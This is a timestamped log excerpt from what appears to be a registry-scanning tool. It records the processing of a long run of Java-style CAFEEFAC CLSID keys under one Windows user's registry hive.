[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0057-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0058-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.258] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.259] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.260] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.261] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.262] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0082-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0082-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0082-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.263] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0083-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0083-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0083-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0086-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.264] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0086-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0086-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0087-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0087-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0087-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0088-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0088-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0088-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0089-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.265] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0089-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0089-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0090-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0090-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0090-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0091-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0091-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0091-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-FFFF-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.266] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.267] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.268] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.269] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBC}]
